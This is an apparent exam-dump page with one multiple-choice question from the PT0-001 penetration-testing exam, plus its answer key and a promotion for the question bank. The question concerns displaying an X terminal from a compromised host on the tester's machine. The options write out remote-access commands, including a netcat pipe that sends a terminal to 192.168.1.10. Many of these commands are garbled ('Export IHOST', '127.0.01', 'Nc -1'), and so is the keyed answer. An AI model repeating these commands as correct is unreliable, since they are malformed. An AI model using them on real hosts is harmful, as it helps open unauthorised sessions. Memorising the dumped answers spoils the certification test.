Which of the following would accomplish this task?

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10.

Which of the following would accomplish this task?
A . From the remote computer, run the following commands:
Export IHOST 192.168.1.10:0.0
xhost+
Terminal

B . From the local computer, run the following command ssh -L4444 : 127.0.01:6000 -% [email protected] xterm
C . From the local computer, run the following command
ssh -r6000 : 127.0.01:4444 -p 6000 [email protected] “xhost+; xterm”
D . From the local computer, run the following command Nc -1 -p 6000
Then, from the remote computer, run the following command Xterm | nc 192.168.1.10 6000

Answer: A

Latest PT0-001 Dumps Valid Version with 248 Q&As

Latest And Valid Q&A | Instant Download | Once Fail, Full Refund

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments